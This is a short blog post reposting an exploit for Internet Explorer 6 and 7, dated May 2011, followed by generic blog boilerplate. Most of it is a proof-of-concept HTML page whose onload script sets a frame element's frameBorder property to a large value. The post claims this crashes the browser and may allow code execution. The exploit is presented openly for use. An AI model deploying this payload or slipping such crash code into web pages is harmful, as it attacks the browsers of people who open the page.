IE6 / 7 Remote Dos vulnerability# Exploit Title: IE6 / 7 Remote Dos vulnerability # Date: 17/05/2011 # Author: TRINGLE2011 # Version: 6 / 7 # Tested on: Windows Xp Sp3 #category Remote Dos, might lead to code execution. # The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder causing a dos and may lead to code execution. #code <html> <head> <script> function dos(){ var e = document.createElement('frame'); var prop = 'frameBorder'; e[prop] = 0123456789; } </script> </head> <body onload="dos()"> </body> </html>
This Blog is for intellectual computer persons. Who not only like computing but feel proud to be a computer maniac. More over this is the place for hackers and Programmers. We Shall Over Come !!!!!
Post Your Wish
Tuesday, May 17, 2011
IE6 / 7 Remote Dos vulnerability
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment